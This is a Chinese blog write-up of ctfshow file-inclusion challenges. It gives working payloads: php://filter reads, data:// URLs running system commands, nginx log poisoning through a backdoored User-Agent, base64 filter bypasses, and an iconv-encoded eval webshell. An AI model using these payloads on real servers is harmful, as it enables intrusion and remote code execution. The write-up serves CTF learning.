ctfshow-web文件包含

最新推荐文章于 2024-07-04 14:42:56 发布
最新推荐文章于 2024-07-04 14:42:56 发布
阅读量820 收藏 25
点赞数 20
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72898152/article/details/136058923
版权

ctfshow-web文件包含

文章目录

78-php&http协议

由代码可知,包含文件即可得到flag,但是并不知道文件名

解决:采用伪协议 参考文献:https://segmentfault.com/a/1190000018991087

方法一:php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

http://7572d0a0-f2e4-4fc7-9baa-148464bfe390.challenge.ctf.show/?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

进行base64解码->拿到flag
在这里插入图片描述

方法二:data:// 协议->data://text/plain

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

http://7572d0a0-f2e4-4fc7-9baa-148464bfe390.challenge.ctf.show/?file=data://text/plain,<?php system("ls");?>

在这里插入图片描述

发现有flag.php,再用system命令拿到flag
在这里插入图片描述

79-data&http协议

观察代码,它使用str_replace()函数进行过滤
在这里插入图片描述

使用data:// 协议->data://text/plain

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

http://698d0dc8-cd64-4e46-89b7-6fef0bc88de9.challenge.ctf.show/?file=data://text/plain,<?=system("tac flag*");?>

因为过滤php,所以我们使用<?=system ->代替 <?php system 同样,后面使用正则表达式flag.php替换为flag*->拿到flag
在这里插入图片描述

80-日志包含

过滤了php和data,而file:// 协议和zip:// & bzip2:// & zlib:// 协议必须要知道路径。但是我们也并不知道flag.php存在的路径

解决:配合日志文件进行getshell,日志会记录访问UA信息,修改UA信息为后门代码,包含即执行后门代码

抓包->查看中间件->是nginx
在这里插入图片描述

查看nginx日志路径
在这里插入图片描述

抓包->将UA改为后门代码->forward
在这里插入图片描述

包含:var/log/nginx/access.log

http://f25ebafd-4034-4b03-914d-d84b38f74af4.challenge.ctf.show/?file=/var/log/nginx/access.log

在这里插入图片描述

日志里会记录访问时间,访问者的UA信息->将UA信息改成后门代码->写入log文件(任何文件后缀都能被当作脚本去执行)

使用系统命令system(“ls”);函数获取文件目录->发现有一个fl0g.php文件

在这里插入图片描述

使用命令system("tac fl0g.php");拿到flag
在这里插入图片描述

81-日志包含-同80关

抓包->更改UA头为后门
在这里插入图片描述

日志包含:var/log/nginx/access.log

http://6ba290db-4bd9-4936-a189-3e3d43c500bb.challenge.ctf.show/?file=/var/log/nginx/access.log

用系统命令x=system("tac fl0g.php");拿到flag

在这里插入图片描述

82-86-SESSION包含

利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含

1.简单来说,上面这个选项开启以后,上传文件,我们能够POST请求查看上传进度

2.我们在session中写入我们要执行的代码

3.用户可以自己定义Session ID,比如在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag,我们能够命名’sess_'后面的名字

4.之后要执行就要包含这个session文件

5.默认情况下,session.upload_progress.cleanup是开启的,一旦读取了所有POST数据,就会清除进度信息

6.于是我们需要条件竞争来读取文件,所谓条件竞争简单来说是在执行系统命令前先执行完自己的代码,在文件上传中很常见

参考链接:https://www.cnblogs.com/NPFS/p/13795170.html

87-php://filter/write&加它编码

观察代码发现,使用了url解码,
在这里插入图片描述

采用伪协议:php://filter/write=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件需要base64编码)

php://filter/write=convert.base64-encode/resource=flag.php

由于浏览器的地址框会自动将url编码解码,所以我们要编码两次(地址框解码一次,urldecode解码一次)

http://c8ae5394-7ec7-402b-ba3e-7a742df19d99.challenge.ctf.show/?file=

观察代码发现->使用post传参给content
在这里插入图片描述

所以我们用post传递后门代码->content=<?php system('tac f*.php');?>

因为我们采用php://filter/write=convert.base64-encode/resource=[文件名]->base64写的代码,所以我们传参也要用base64进行编码(base64解码时,是4个为一组,flag.php的内容<?php die('大佬别秀了');?>中phpdie会参与base64解码,因为php die只有6个字节,补两个a就是8字节了

content=aaPD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

拿到flag

88-data&base64协议

代码过滤了/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\.,但是没有过滤data

使用data:// 协议->data://text/plain

http://127.0.0.1/include.php?file=data://text/plain,<?=system('tac flag*');?>

但是还过滤了(),=,* 等。所以我们可以进行base64编码

http://127.0.0.1/include.php?file=data://text/plain;base64,base64编码后的值

http://fdc6e459-950d-409e-a368-12ac00533f55.challenge.ctf.show/?file=data://text/plain;base64, <?php system('tac *.php');?>aa,对<?php system('tac *.php');?>aa进行编码。因为过滤了=,所以base64编码后的值不能有=,所以我们随便加一些字母去除=

http://fdc6e459-950d-409e-a368-12ac00533f55.challenge.ctf.show/?file=data://text/plain;base64, PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

拿到flag
在这里插入图片描述

117-php://filter/write&新的算法

代码过滤了几乎所有方法,但是没有过滤php,显然—>这一关使用php进行过滤

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hh.php

也过滤了base64,rot13编码

解决:convert.iconv:一种过滤器,和使用iconv()函数处理流数据有等同作用

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php eval($_POST[a]);?>');
echo"经过一次反转:".$result."\n";
echo"经过第二次反转:".iconv("UCS-2LE","UCS-2BE",$result);
?>

在这里插入图片描述

所以经过iconv("UCS-2LE","UCS-2BE", '<?php eval($_POST[a]);?>');转换后的代码为?<hp pvela$(P_SO[T]a;)>?

contents=?<hp pvela$(P_SO[T]a;)>?

在这里插入图片描述

将代码上传后,我们直接访问hh.php触发代码

在这里插入图片描述

通过命令拿到flag
在这里插入图片描述

总结:

include('1.php');
实现过滤功能,是每个代码段进行过滤编写,还是写一个过滤文件
1.每个需要过滤的地方,进行一次过滤的编写
2.每个需要过滤的地方,进行一次文件包含调用过滤函数

1.配合文件上传进行getshell,图片带有脚本后门代码,包含这个图片,脚本代码就被触发
2.配合日志文件进行getshell,日志会记录访问UA信息,修改信息为后门代码,包含即执行后门代码、
3.配合会话文件进行getshell

文件包含思路:

本地包含:LFI local file include
包含一个文件,这个文件有后门代码,就可以shell连接
文件来源?
1.可以通过文件上传获取,上传的文件在服务器上
2.没有文件上传,借助日志写入(UA),session文件写入
3.伪协议没有上传文件也能进行php代码执行,读文件,写文件(编码算法的转换)

我不是陆神
关注
  • 20
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTFshow 文件包含 web117
Kradress的博客
12-12 788
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_ma
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4191
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 1722
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
ctfshow-web入门-文件包含web78、web79、web80、web81)
最新发布
Welcome To Myon'Blog !
07-04 1485
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
ctfshow-web80
m0_73303597的博客
01-04 637
自用
ctfshow-web80、81
m0_73590931的博客
08-11 431
然后,代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?,第二次替换将file中的data字符串替换为?首先,代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent,那还是在user-agent中插入一句话木马,后续做法与web80一样。最后,代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息,发现是nginx服务器。
ctfshow-web41~60-WP
02-21
CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 ##...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7273
个人ctfshow刷题记录
文件包含&CTFshow78-117
m0_63917373的博客
11-08 657
CTFSHOW 文件包含
ctfshow web入门(文件包含
qq_53263789的博客
07-19 687
ctfshow
CTF题型 php://filter特殊编码绕过小汇总
qq_39947980的博客
03-28 823
php://filter是一个伪协议,它允许你读取经过过滤器处理的数据流。过滤器可以执行各种转换,如 base64 编码/解码、字符串压缩/解压缩等它的存在是数据流和控制流的“中间人”,有点类似我们抓包工具Burp的感觉,我们可以人为进行操控更改。
php文件包含-CTFshow-web80
读万卷书,行万里路。
07-26 587
0 前言 前面我通过 2 个 CTF 题目来讲解了各种协议在文件包含时的简单用法。这篇文章主要是对 web80 做个简要的分析。 1 解题思路 在 web79 中只过滤了 php,而在 web80 中过滤了 php 和 data。两个题都是使用 str_replace 进行过滤,所以 web80 的思路和 web79 是一样的。 利用大小写绕过 str_replace 函数。(经过测试data 协议无法使用 DATA 绕过。php 伪协议则只能使用 php://input 协议,不能使用 php://fi
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1696
ctfshow学习记录-web入门(文件包含web78-87)
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 890
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我不是陆神

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值